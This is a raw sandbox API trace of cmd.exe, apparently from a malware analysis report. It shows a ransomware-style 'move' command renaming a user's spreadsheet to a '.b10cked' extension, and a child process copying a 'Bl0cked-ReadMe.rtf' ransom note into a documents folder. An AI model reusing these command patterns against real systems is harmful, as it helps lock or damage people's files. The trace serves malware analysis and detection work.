0x0 [0140.190] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20ebac, lpData=0x20ebb0, lpcbData=0x20eba8*=0x1000 | out: lpType=0x20ebac*=0x0, lpData=0x20ebb0*=0xc8, lpcbData=0x20eba8*=0x1000) returned 0x2 [0140.190] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20ebac, lpData=0x20ebb0, lpcbData=0x20eba8*=0x1000 | out: lpType=0x20ebac*=0x4, lpData=0x20ebb0*=0x1, lpcbData=0x20eba8*=0x4) returned 0x0 [0140.190] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20ebac, lpData=0x20ebb0, lpcbData=0x20eba8*=0x1000 | out: lpType=0x20ebac*=0x0, lpData=0x20ebb0*=0x1, lpcbData=0x20eba8*=0x1000) returned 0x2 [0140.190] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20ebac, lpData=0x20ebb0, lpcbData=0x20eba8*=0x1000 | out: lpType=0x20ebac*=0x4, lpData=0x20ebb0*=0x0, lpcbData=0x20eba8*=0x4) returned 0x0 [0140.190] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20ebac, lpData=0x20ebb0, lpcbData=0x20eba8*=0x1000 | out: lpType=0x20ebac*=0x4, lpData=0x20ebb0*=0x40, lpcbData=0x20eba8*=0x4) returned 0x0 [0140.190] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20ebac, lpData=0x20ebb0, lpcbData=0x20eba8*=0x1000 | out: lpType=0x20ebac*=0x4, lpData=0x20ebb0*=0x40, lpcbData=0x20eba8*=0x4) returned 0x0 [0140.190] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20ebac, lpData=0x20ebb0, lpcbData=0x20eba8*=0x1000 | out: lpType=0x20ebac*=0x0, lpData=0x20ebb0*=0x40, lpcbData=0x20eba8*=0x1000) returned 0x2 [0140.191] RegCloseKey (hKey=0x40) returned 0x0 [0140.191] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20eba4 | out: phkResult=0x20eba4*=0x40) returned 0x0 [0140.191] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20ebac, lpData=0x20ebb0, lpcbData=0x20eba8*=0x1000 | out: lpType=0x20ebac*=0x0, lpData=0x20ebb0*=0x40, lpcbData=0x20eba8*=0x1000) returned 0x2 [0140.191] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20ebac, lpData=0x20ebb0, lpcbData=0x20eba8*=0x1000 | out: lpType=0x20ebac*=0x4, lpData=0x20ebb0*=0x1, lpcbData=0x20eba8*=0x4) returned 0x0 [0140.191] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20ebac, lpData=0x20ebb0, lpcbData=0x20eba8*=0x1000 | out: lpType=0x20ebac*=0x0, lpData=0x20ebb0*=0x1, lpcbData=0x20eba8*=0x1000) returned 0x2 [0140.191] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20ebac, lpData=0x20ebb0, lpcbData=0x20eba8*=0x1000 | out: lpType=0x20ebac*=0x4, lpData=0x20ebb0*=0x0, lpcbData=0x20eba8*=0x4) returned 0x0 [0140.191] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20ebac, lpData=0x20ebb0, lpcbData=0x20eba8*=0x1000 | out: lpType=0x20ebac*=0x4, lpData=0x20ebb0*=0x9, lpcbData=0x20eba8*=0x4) returned 0x0 [0140.191] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20ebac, lpData=0x20ebb0, lpcbData=0x20eba8*=0x1000 | out: lpType=0x20ebac*=0x4, lpData=0x20ebb0*=0x9, lpcbData=0x20eba8*=0x4) returned 0x0 [0140.191] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20ebac, lpData=0x20ebb0, lpcbData=0x20eba8*=0x1000 | out: lpType=0x20ebac*=0x0, lpData=0x20ebb0*=0x9, lpcbData=0x20eba8*=0x1000) returned 0x2 [0140.191] RegCloseKey (hKey=0x40) returned 0x0 [0140.191] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88636e [0140.191] srand (_Seed=0x5b88636e) [0140.191] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\VBKNJI~1.ODS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\VBKNjIyz39y.ods.b10cked\"" [0140.191] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\VBKNJI~1.ODS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\VBKNjIyz39y.ods.b10cked\"" [0140.191] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.192] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3c1900, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0140.192] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0140.192] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0140.192] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0140.192] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0140.192] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0140.192] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0140.192] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0140.192] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0140.192] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0140.192] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0140.192] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0140.192] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0140.192] GetEnvironmentStringsW () returned 0x3c22f0* [0140.192] FreeEnvironmentStringsW (penv=0x3c22f0) returned 1 [0140.192] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.193] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0140.193] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0140.193] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0140.193] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0140.193] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0140.193] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0140.193] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0140.193] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0140.193] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0140.193] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x20f970 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.193] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x20f970, lpFilePart=0x20f96c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x20f96c*="Desktop") returned 0x18 [0140.193] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0140.193] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x20f6ec | out: lpFindFileData=0x20f6ec) returned 0x3c0030 [0140.193] FindClose (in: hFindFile=0x3c0030 | out: hFindFile=0x3c0030) returned 1 [0140.193] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x20f6ec | out: lpFindFileData=0x20f6ec) returned 0x3c0030 [0140.193] FindClose (in: hFindFile=0x3c0030 | out: hFindFile=0x3c0030) returned 1 [0140.194] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x20f6ec | out: lpFindFileData=0x20f6ec) returned 0x3c0030 [0140.194] FindClose (in: hFindFile=0x3c0030 | out: hFindFile=0x3c0030) returned 1 [0140.194] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0140.194] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0140.194] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0140.194] GetEnvironmentStringsW () returned 0x3c2b10* [0140.194] FreeEnvironmentStringsW (penv=0x3c2b10) returned 1 [0140.194] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.195] GetConsoleOutputCP () returned 0x1b5 [0140.195] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0140.195] GetUserDefaultLCID () returned 0x409 [0140.195] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0140.195] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x20fab0, cchData=128 | out: lpLCData="0") returned 2 [0140.195] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x20fab0, cchData=128 | out: lpLCData="0") returned 2 [0140.195] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x20fab0, cchData=128 | out: lpLCData="1") returned 2 [0140.196] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0140.196] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0140.196] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0140.196] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0140.196] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0140.196] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0140.196] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0140.196] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0140.196] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0140.196] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0140.196] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0140.197] GetConsoleTitleW (in: lpConsoleTitle=0x3b08f8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.197] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0140.197] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0140.197] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0140.197] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0140.198] _wcsicmp (_String1="move", _String2=")") returned 68 [0140.198] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0140.198] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0140.198] _wcsicmp (_String1="IF", _String2="move") returned -4 [0140.198] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0140.198] _wcsicmp (_String1="REM", _String2="move") returned 5 [0140.198] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0140.202] GetConsoleTitleW (in: lpConsoleTitle=0x20f7a8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.855] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0140.855] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0140.855] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0140.855] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0140.855] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0140.855] _wcsicmp (_String1="move", _String2="CD") returned 10 [0140.855] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0140.855] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0140.855] _wcsicmp (_String1="move", _String2="REN") returned -5 [0140.855] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0140.855] _wcsicmp (_String1="move", _String2="SET") returned -6 [0140.855] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0140.855] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0140.855] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0140.855] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0140.856] _wcsicmp (_String1="move", _String2="MD") returned 11 [0140.856] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0140.856] _wcsicmp (_String1="move", _String2="RD") returned -5 [0140.856] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0140.856] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0140.856] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0140.856] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0140.856] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0140.856] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0140.856] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0140.856] _wcsicmp (_String1="move", _String2="VER") returned -9 [0140.856] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0140.856] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0140.856] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0140.856] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0140.856] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0140.856] _wcsicmp (_String1="move", _String2="START") returned -6 [0140.856] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0140.856] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0140.856] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0140.858] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0140.858] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0140.858] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x20f564, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x20f55c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x20f55c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0140.858] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0140.858] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0140.858] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0140.858] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0140.858] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0140.858] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0140.858] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0140.858] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0140.858] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0140.858] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0140.859] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0140.859] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0140.859] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0140.859] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0140.859] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0140.859] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0140.859] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0140.859] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0140.859] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0140.859] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0140.859] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0140.859] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0140.859] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0140.859] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0140.859] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0140.859] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0140.859] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0140.859] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0140.859] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0140.859] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0140.859] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0140.859] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0140.860] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0140.860] _wcsicmp (_String1="VBKNJI~1.ODS", _String2=".") returned 72 [0140.860] _wcsicmp (_String1="VBKNJI~1.ODS", _String2="..") returned 72 [0140.860] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\VBKNJI~1.ODS" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1\\vbknji~1.ods")) returned 0x20 [0140.860] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3c1e70 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.860] SetErrorMode (uMode=0x0) returned 0x0 [0140.860] SetErrorMode (uMode=0x1) returned 0x0 [0140.860] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\VBKNJI~1.ODS", nBufferLength=0x104, lpBuffer=0x20eeec, lpFilePart=0x20eed4 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\VBKNJI~1.ODS", lpFilePart=0x20eed4*="VBKNJI~1.ODS") returned 0x2f [0140.860] SetErrorMode (uMode=0x0) returned 0x1 [0140.860] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1")) returned 0x12 [0140.861] _wcsicmp (_String1="VBKNJI~1.ODS", _String2=".") returned 72 [0140.861] _wcsicmp (_String1="VBKNJI~1.ODS", _String2="..") returned 72 [0140.861] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\VBKNJI~1.ODS" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1\\vbknji~1.ods")) returned 0x20 [0140.861] SetErrorMode (uMode=0x0) returned 0x0 [0140.861] SetErrorMode (uMode=0x1) returned 0x0 [0140.861] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\VBKNJI~1.ODS", nBufferLength=0x104, lpBuffer=0x20f368, lpFilePart=0x20f100 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\VBKNJI~1.ODS", lpFilePart=0x20f100*="VBKNJI~1.ODS") returned 0x2f [0140.861] SetErrorMode (uMode=0x0) returned 0x1 [0140.861] SetErrorMode (uMode=0x0) returned 0x0 [0140.861] SetErrorMode (uMode=0x1) returned 0x0 [0140.861] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\VBKNjIyz39y.ods.b10cked", nBufferLength=0x104, lpBuffer=0x20f570, lpFilePart=0x20f100 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\VBKNjIyz39y.ods.b10cked", lpFilePart=0x20f100*="VBKNjIyz39y.ods.b10cked") returned 0x3a [0140.861] SetErrorMode (uMode=0x0) returned 0x1 [0140.861] SetLastError (dwErrCode=0x0) [0140.861] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\VBKNjIyz39y.ods.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1\\vbknjiyz39y.ods.b10cked")) returned 0xffffffff [0140.861] GetLastError () returned 0x2 [0140.861] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\VBKNJI~1.ODS", fInfoLevelId=0x1, lpFindFileData=0x20ea7c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ea7c) returned 0x3b0eb8 [0140.862] FindNextFileW (in: hFindFile=0x3b0eb8, lpFindFileData=0x20ea7c | out: lpFindFileData=0x20ea7c) returned 0 [0140.864] GetLastError () returned 0x12 [0140.864] FindClose (in: hFindFile=0x3b0eb8 | out: hFindFile=0x3b0eb8) returned 1 [0140.865] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\VBKNJI~1.ODS", fInfoLevelId=0x1, lpFindFileData=0x3c1c10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3c1c10) returned 0x3b0eb8 [0140.865] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\VBKNjIyz39y.ods.b10cked", nBufferLength=0x104, lpBuffer=0x20ed14, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\VBKNjIyz39y.ods.b10cked", lpFilePart=0x0) returned 0x3a [0140.865] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\VBKNjIyz39y.ods", nBufferLength=0x104, lpBuffer=0x20ed14, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\VBKNjIyz39y.ods", lpFilePart=0x0) returned 0x32 [0140.865] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\VBKNjIyz39y.ods" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1\\vbknjiyz39y.ods")) returned 0x20 [0140.865] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\VBKNjIyz39y.ods" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1\\vbknjiyz39y.ods"), lpNewFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\VBKNjIyz39y.ods.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1\\vbknjiyz39y.ods.b10cked"), dwFlags=0x3) returned 1 [0140.865] FindClose (in: hFindFile=0x3b0eb8 | out: hFindFile=0x3b0eb8) returned 1 [0140.865] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x20ecc8 | out: _Buffer=" 1") returned 9 [0140.865] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.865] GetFileType (hFile=0x7) returned 0x2 [0140.866] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0140.866] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x20ec54 | out: lpMode=0x20ec54) returned 1 [0140.866] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.866] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20ec88 | out: lpConsoleScreenBufferInfo=0x20ec88) returned 1 [0140.866] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0140.866] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x20ecc8 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0140.866] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x20ecac, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x20ecac*=0x1a) returned 1 [0140.867] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.867] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0140.867] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.867] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0140.867] _get_osfhandle (_FileHandle=0) returned 0x3 [0140.867] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0140.867] SetConsoleInputExeNameW () returned 0x1 [0140.867] GetConsoleOutputCP () returned 0x1b5 [0140.867] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0140.867] SetThreadUILanguage (LangId=0x0) returned 0x409 [0140.867] exit (_Code=0) Process: id = "163" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16a40" os_pid = "0xd90" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 14782 start_va = 0x10000 end_va = 0x2ffff 